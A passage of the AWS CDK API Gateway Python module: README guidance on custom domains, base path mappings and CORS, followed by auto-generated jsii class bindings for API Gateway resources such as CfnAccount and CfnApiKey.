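the hash. A hedged sketch using the `addToLogicalId` method (assuming
`deployment` is an `apigateway.Deployment` you defined yourself, as shown
earlier):
```python
# Salting the logical ID: changing this value forces a new deployment
deployment.add_to_logical_id({"api_version": "v2"})
```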
By default, old deployments are *deleted*. You can set `retainDeployments: true`
to allow users to revert the stage to an old deployment manually.
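For example, a minimal sketch:
```python
api = apigateway.RestApi(self, "books",
    # Keep superseded deployments so the stage can be rolled back to
    # one of them from the API Gateway console.
    retain_deployments=True
)
```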
### Custom Domains
To associate an API with a custom domain, use the `domainName` configuration when
you define your API:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
api = apigw.RestApi(self, "MyDomain",
domain_name={
"domain_name": "example.com",
"certificate": acm_certificate_for_example_com
}
)
```
This will define a `DomainName` resource for you, along with a `BasePathMapping`
from the root of the domain to the deployment stage of the API. This is a common
setup.
To route domain traffic to an API Gateway API, use Amazon Route 53 to create an
alias record. An alias record is a Route 53 extension to DNS. It's similar to a
CNAME record, but you can create an alias record both for the root domain, such
as `example.com`, and for subdomains, such as `www.example.com`. (You can create
CNAME records only for subdomains.)
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
route53.ARecord(self, "CustomDomainAliasRecord",
zone=hosted_zone_for_example_com,
target=route53.AddressRecordTarget.from_alias(route53_targets.ApiGateway(api))
)
```
You can also define a `DomainName` resource directly in order to customize the default behavior:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
apigw.DomainName(self, "custom-domain",
domain_name="example.com",
certificate=acm_certificate_for_example_com,
endpoint_type=apigw.EndpointType.EDGE
)
```
Once you have a domain, you can map base paths of the domain to APIs.
The following example will map the URL https://example.com/go-to-api1
to the `api1` API and https://example.com/boom to the `api2` API.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
domain.add_base_path_mapping(api1, base_path="go-to-api1")
domain.add_base_path_mapping(api2, base_path="boom")
```
NOTE: currently, the mapping will always be assigned to the API's
`deploymentStage`, which is automatically set to the latest API
deployment. Raise a GitHub issue if you require more granular control over
mapping base paths to stages.
If you don't specify `basePath`, all URLs under this domain will be mapped
to the API, and you won't be able to map another API to the same domain:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
domain.add_base_path_mapping(api)
```
This can also be achieved through the `mapping` configuration when defining the
domain:
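A hedged sketch (assuming the same `acm_certificate_for_example_com` and an
existing `api`; `mapping` maps the domain root to that API's deployment stage):
```python
apigw.DomainName(self, "custom-domain",
    domain_name="example.com",
    certificate=acm_certificate_for_example_com,
    mapping=api
)
```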
If you wish to set up this domain with an Amazon Route53 alias, use `route53_targets.ApiGatewayDomain`:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
route53.ARecord(self, "CustomDomainAliasRecord",
zone=hosted_zone_for_example_com,
target=route53.AddressRecordTarget.from_alias(route53_targets.ApiGatewayDomain(domain_name))
)
```
### Cross Origin Resource Sharing (CORS)
[Cross-Origin Resource Sharing (CORS)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) is a mechanism
that uses additional HTTP headers to tell browsers to give a web application
running at one origin access to selected resources from a different origin. A
web application executes a cross-origin HTTP request when it requests a resource
that has a different origin (domain, protocol, or port) from its own.
You can add the CORS [preflight](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#Preflighted_requests) OPTIONS HTTP method to any API resource via the `defaultCorsPreflightOptions` option, or by calling `addCorsPreflight` on a specific resource.
The following example will enable CORS for all methods and all origins on all resources of the API:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
apigateway.RestApi(self, "api",
default_cors_preflight_options={
"allow_origins": apigateway.Cors.ALL_ORIGINS,
"allow_methods": apigateway.Cors.ALL_METHODS
}
)
```
The following example will add an OPTIONS method to the `myResource` API resource, which
only allows GET and PUT HTTP requests from the origin https://amazon.com.
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
my_resource.add_cors_preflight(
allow_origins=["https://amazon.com"],
allow_methods=["GET", "PUT"]
)
```
See the
[`CorsOptions`](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_aws-apigateway.CorsOptions.html)
API reference for a detailed list of supported configuration options.
You can also specify these defaults at the resource level, in which case they will be applied to the entire resource sub-tree:
```python
# Example automatically generated. See https://github.com/aws/jsii/issues/826
subtree = resource.add_resource("subtree",
default_cors_preflight_options={
"allow_origins": ["https://amazon.com"]
}
)
```
This means that all resources under `subtree` (inclusive) will have a preflight
OPTIONS method added to them.
See [#906](https://github.com/aws/aws-cdk/issues/906) for a list of CORS
features which are not yet supported.
---
This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project.
"""
import abc
import datetime
import enum
import typing
import jsii
import jsii.compat
import publication
from jsii.python import classproperty
import aws_cdk.aws_certificatemanager
import aws_cdk.aws_elasticloadbalancingv2
import aws_cdk.aws_iam
import aws_cdk.aws_lambda
import aws_cdk.core
__jsii_assembly__ = jsii.JSIIAssembly.load("@aws-cdk/aws-apigateway", "1.18.0", __name__, "aws-apigateway@1.18.0.jsii.tgz")
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.ApiKeySourceType")
class ApiKeySourceType(enum.Enum):
HEADER = "HEADER"
"""To read the API key from the ``X-API-Key`` header of a request."""
AUTHORIZER = "AUTHORIZER"
"""To read the API key from the ``UsageIdentifierKey`` from a custom authorizer."""
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.AuthorizationType")
class AuthorizationType(enum.Enum):
NONE = "NONE"
"""Open access."""
IAM = "IAM"
"""Use AWS IAM permissions."""
CUSTOM = "CUSTOM"
"""Use a custom authorizer."""
COGNITO = "COGNITO"
"""Use an AWS Cognito user pool."""
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.AwsIntegrationProps", jsii_struct_bases=[], name_mapping={'service': 'service', 'action': 'action', 'action_parameters': 'actionParameters', 'integration_http_method': 'integrationHttpMethod', 'options': 'options', 'path': 'path', 'proxy': 'proxy', 'subdomain': 'subdomain'})
class AwsIntegrationProps():
def __init__(self, *, service: str, action: typing.Optional[str]=None, action_parameters: typing.Optional[typing.Mapping[str,str]]=None, integration_http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, path: typing.Optional[str]=None, proxy: typing.Optional[bool]=None, subdomain: typing.Optional[str]=None):
"""
:param service: The name of the integrated AWS service (e.g. ``s3``).
:param action: The AWS action to perform in the integration. Use ``actionParameters`` to specify key-value params for the action. Mutually exclusive with ``path``.
:param action_parameters: Parameters for the action. ``action`` must be set, and ``path`` must be undefined. The action params will be URL encoded.
:param integration_http_method: The integration's HTTP method type. Default: POST
:param options: Integration options, such as content handling, request/response mapping, etc.
:param path: The path to use for path-based APIs. For example, for S3 GET, you can set path to ``bucket/key``. For Lambda, you can set path to ``2015-03-31/functions/${function-arn}/invocations``. Mutually exclusive with the ``action`` option.
:param proxy: Use AWS_PROXY integration. Default: false
:param subdomain: A designated subdomain supported by certain AWS services for fast host-name lookup.
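Example (a hedged sketch of an S3 integration via the ``AwsIntegration``
class; the bucket and key names are illustrative)::

    integration = AwsIntegration(service="s3",
        path="my-bucket/assets.json",
        integration_http_method="GET")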
"""
if isinstance(options, dict): options = IntegrationOptions(**options)
self._values = {
'service': service,
}
if action is not None: self._values["action"] = action
if action_parameters is not None: self._values["action_parameters"] = action_parameters
if integration_http_method is not None: self._values["integration_http_method"] = integration_http_method
if options is not None: self._values["options"] = options
if path is not None: self._values["path"] = path
if proxy is not None: self._values["proxy"] = proxy
if subdomain is not None: self._values["subdomain"] = subdomain
@property
def service(self) -> str:
"""The name of the integrated AWS service (e.g. ``s3``)."""
return self._values.get('service')
@property
def action(self) -> typing.Optional[str]:
"""The AWS action to perform in the integration.
Use ``actionParameters`` to specify key-value params for the action.
Mutually exclusive with ``path``.
"""
return self._values.get('action')
@property
def action_parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""Parameters for the action.
``action`` must be set, and ``path`` must be undefined.
The action params will be URL encoded.
"""
return self._values.get('action_parameters')
@property
def integration_http_method(self) -> typing.Optional[str]:
"""The integration's HTTP method type.
default
:default: POST
"""
return self._values.get('integration_http_method')
@property
def options(self) -> typing.Optional["IntegrationOptions"]:
"""Integration options, such as content handling, request/response mapping, etc."""
return self._values.get('options')
@property
def path(self) -> typing.Optional[str]:
"""The path to use for path-base APIs.
For example, for S3 GET, you can set path to ``bucket/key``.
For lambda, you can set path to ``2015-03-31/functions/${function-arn}/invocations``
Mutually exclusive with the ``action`` options.
"""
return self._values.get('path')
@property
def proxy(self) -> typing.Optional[bool]:
"""Use AWS_PROXY integration.
default
:default: false
"""
return self._values.get('proxy')
@property
def subdomain(self) -> typing.Optional[str]:
"""A designated subdomain supported by certain AWS service for fast host-name lookup."""
return self._values.get('subdomain')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'AwsIntegrationProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class BasePathMapping(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.BasePathMapping"):
"""This resource creates a base path that clients who call your API must use in the invocation URL.
In most cases, you will probably want to use
``DomainName.addBasePathMapping()`` to define mappings.
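Example (as shown in the module README; assumes an existing ``domain``
and ``api``)::

    domain.add_base_path_mapping(api, base_path="maps")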
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, domain_name: "IDomainName", rest_api: "IRestApi", base_path: typing.Optional[str]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param domain_name: The DomainName to associate with this base path mapping.
:param rest_api: The RestApi resource to target.
:param base_path: The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string. Default: - map requests from the domain root (e.g. ``example.com``). If this is undefined, no additional mappings will be allowed on this domain name.
"""
props = BasePathMappingProps(domain_name=domain_name, rest_api=rest_api, base_path=base_path)
jsii.create(BasePathMapping, self, [scope, id, props])
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.BasePathMappingOptions", jsii_struct_bases=[], name_mapping={'base_path': 'basePath'})
class BasePathMappingOptions():
def __init__(self, *, base_path: typing.Optional[str]=None):
"""
:param base_path: The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string. Default: - map requests from the domain root (e.g. ``example.com``). If this is undefined, no additional mappings will be allowed on this domain name.
"""
self._values = {
}
if base_path is not None: self._values["base_path"] = base_path
@property
def base_path(self) -> typing.Optional[str]:
"""The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string.
default
:default:
- map requests from the domain root (e.g. ``example.com``). If this
is undefined, no additional mappings will be allowed on this domain name.
"""
return self._values.get('base_path')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'BasePathMappingOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.BasePathMappingProps", jsii_struct_bases=[BasePathMappingOptions], name_mapping={'base_path': 'basePath', 'domain_name': 'domainName', 'rest_api': 'restApi'})
class BasePathMappingProps(BasePathMappingOptions):
def __init__(self, *, base_path: typing.Optional[str]=None, domain_name: "IDomainName", rest_api: "IRestApi"):
"""
:param base_path: The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string. Default: - map requests from the domain root (e.g. ``example.com``). If this is undefined, no additional mappings will be allowed on this domain name.
:param domain_name: The DomainName to associate with this base path mapping.
:param rest_api: The RestApi resource to target.
"""
self._values = {
'domain_name': domain_name,
'rest_api': rest_api,
}
if base_path is not None: self._values["base_path"] = base_path
@property
def base_path(self) -> typing.Optional[str]:
"""The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string.
default
:default:
- map requests from the domain root (e.g. ``example.com``). If this
is undefined, no additional mappings will be allowed on this domain name.
"""
return self._values.get('base_path')
@property
def domain_name(self) -> "IDomainName":
"""The DomainName to associate with this base path mapping."""
return self._values.get('domain_name')
@property
def rest_api(self) -> "IRestApi":
"""The RestApi resource to target."""
return self._values.get('rest_api')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'BasePathMappingProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnAccount(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnAccount"):
"""A CloudFormation ``AWS::ApiGateway::Account``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-account.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Account
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, cloud_watch_role_arn: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::Account``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param cloud_watch_role_arn: ``AWS::ApiGateway::Account.CloudWatchRoleArn``.
"""
props = CfnAccountProps(cloud_watch_role_arn=cloud_watch_role_arn)
jsii.create(CfnAccount, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="cloudWatchRoleArn")
def cloud_watch_role_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Account.CloudWatchRoleArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-account.html#cfn-apigateway-account-cloudwatchrolearn
"""
return jsii.get(self, "cloudWatchRoleArn")
@cloud_watch_role_arn.setter
def cloud_watch_role_arn(self, value: typing.Optional[str]):
return jsii.set(self, "cloudWatchRoleArn", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnAccountProps", jsii_struct_bases=[], name_mapping={'cloud_watch_role_arn': 'cloudWatchRoleArn'})
class CfnAccountProps():
def __init__(self, *, cloud_watch_role_arn: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::Account``.
:param cloud_watch_role_arn: ``AWS::ApiGateway::Account.CloudWatchRoleArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-account.html
"""
self._values = {
}
if cloud_watch_role_arn is not None: self._values["cloud_watch_role_arn"] = cloud_watch_role_arn
@property
def cloud_watch_role_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Account.CloudWatchRoleArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-account.html#cfn-apigateway-account-cloudwatchrolearn
"""
return self._values.get('cloud_watch_role_arn')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnAccountProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnApiKey(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnApiKey"):
"""A CloudFormation ``AWS::ApiGateway::ApiKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::ApiKey
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, customer_id: typing.Optional[str]=None, description: typing.Optional[str]=None, enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, generate_distinct_id: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, name: typing.Optional[str]=None, stage_keys: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "StageKeyProperty"]]]]]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, value: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::ApiKey``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param customer_id: ``AWS::ApiGateway::ApiKey.CustomerId``.
:param description: ``AWS::ApiGateway::ApiKey.Description``.
:param enabled: ``AWS::ApiGateway::ApiKey.Enabled``.
:param generate_distinct_id: ``AWS::ApiGateway::ApiKey.GenerateDistinctId``.
:param name: ``AWS::ApiGateway::ApiKey.Name``.
:param stage_keys: ``AWS::ApiGateway::ApiKey.StageKeys``.
:param tags: ``AWS::ApiGateway::ApiKey.Tags``.
:param value: ``AWS::ApiGateway::ApiKey.Value``.
"""
props = CfnApiKeyProps(customer_id=customer_id, description=description, enabled=enabled, generate_distinct_id=generate_distinct_id, name=name, stage_keys=stage_keys, tags=tags, value=value)
jsii.create(CfnApiKey, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::ApiKey.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="customerId")
def customer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.CustomerId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-customerid
"""
return jsii.get(self, "customerId")
@customer_id.setter
def customer_id(self, value: typing.Optional[str]):
return jsii.set(self, "customerId", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="enabled")
def enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::ApiKey.Enabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-enabled
"""
return jsii.get(self, "enabled")
@enabled.setter
def enabled(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "enabled", value)
@property
@jsii.member(jsii_name="generateDistinctId")
def generate_distinct_id(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::ApiKey.GenerateDistinctId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-generatedistinctid
"""
return jsii.get(self, "generateDistinctId")
@generate_distinct_id.setter
def generate_distinct_id(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "generateDistinctId", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: typing.Optional[str]):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="stageKeys")
def stage_keys(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "StageKeyProperty"]]]]]:
"""``AWS::ApiGateway::ApiKey.StageKeys``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-stagekeys
"""
return jsii.get(self, "stageKeys")
@stage_keys.setter
def stage_keys(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "StageKeyProperty"]]]]]):
return jsii.set(self, "stageKeys", value)
@property
@jsii.member(jsii_name="value")
def value(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Value``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-value
"""
return jsii.get(self, "value")
@value.setter
def value(self, value: typing.Optional[str]):
return jsii.set(self, "value", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnApiKey.StageKeyProperty", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'stage_name': 'stageName'})
class StageKeyProperty():
def __init__(self, *, rest_api_id: typing.Optional[str]=None, stage_name: typing.Optional[str]=None):
"""
:param rest_api_id: ``CfnApiKey.StageKeyProperty.RestApiId``.
:param stage_name: ``CfnApiKey.StageKeyProperty.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-apikey-stagekey.html
"""
self._values = {
}
if rest_api_id is not None: self._values["rest_api_id"] = rest_api_id
if stage_name is not None: self._values["stage_name"] = stage_name
@property
def rest_api_id(self) -> typing.Optional[str]:
"""``CfnApiKey.StageKeyProperty.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-apikey-stagekey.html#cfn-apigateway-apikey-stagekey-restapiid
"""
return self._values.get('rest_api_id')
@property
def stage_name(self) -> typing.Optional[str]:
"""``CfnApiKey.StageKeyProperty.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-apikey-stagekey.html#cfn-apigateway-apikey-stagekey-stagename
"""
return self._values.get('stage_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'StageKeyProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnApiKeyProps", jsii_struct_bases=[], name_mapping={'customer_id': 'customerId', 'description': 'description', 'enabled': 'enabled', 'generate_distinct_id': 'generateDistinctId', 'name': 'name', 'stage_keys': 'stageKeys', 'tags': 'tags', 'value': 'value'})
class CfnApiKeyProps():
def __init__(self, *, customer_id: typing.Optional[str]=None, description: typing.Optional[str]=None, enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, generate_distinct_id: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, name: typing.Optional[str]=None, stage_keys: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnApiKey.StageKeyProperty"]]]]]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, value: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::ApiKey``.
:param customer_id: ``AWS::ApiGateway::ApiKey.CustomerId``.
:param description: ``AWS::ApiGateway::ApiKey.Description``.
:param enabled: ``AWS::ApiGateway::ApiKey.Enabled``.
:param generate_distinct_id: ``AWS::ApiGateway::ApiKey.GenerateDistinctId``.
:param name: ``AWS::ApiGateway::ApiKey.Name``.
:param stage_keys: ``AWS::ApiGateway::ApiKey.StageKeys``.
:param tags: ``AWS::ApiGateway::ApiKey.Tags``.
:param value: ``AWS::ApiGateway::ApiKey.Value``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html
"""
self._values = {
}
if customer_id is not None: self._values["customer_id"] = customer_id
if description is not None: self._values["description"] = description
if enabled is not None: self._values["enabled"] = enabled
if generate_distinct_id is not None: self._values["generate_distinct_id"] = generate_distinct_id
if name is not None: self._values["name"] = name
if stage_keys is not None: self._values["stage_keys"] = stage_keys
if tags is not None: self._values["tags"] = tags
if value is not None: self._values["value"] = value
@property
def customer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.CustomerId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-customerid
"""
return self._values.get('customer_id')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-description
"""
return self._values.get('description')
@property
def enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::ApiKey.Enabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-enabled
"""
return self._values.get('enabled')
@property
def generate_distinct_id(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::ApiKey.GenerateDistinctId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-generatedistinctid
"""
return self._values.get('generate_distinct_id')
@property
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-name
"""
return self._values.get('name')
@property
def stage_keys(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnApiKey.StageKeyProperty"]]]]]:
"""``AWS::ApiGateway::ApiKey.StageKeys``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-stagekeys
"""
return self._values.get('stage_keys')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::ApiKey.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-tags
"""
return self._values.get('tags')
@property
def value(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Value``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-value
"""
return self._values.get('value')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnApiKeyProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnApiMappingV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnApiMappingV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::ApiMapping``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::ApiMapping
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, domain_name: str, stage: str, api_mapping_key: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::ApiMapping``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
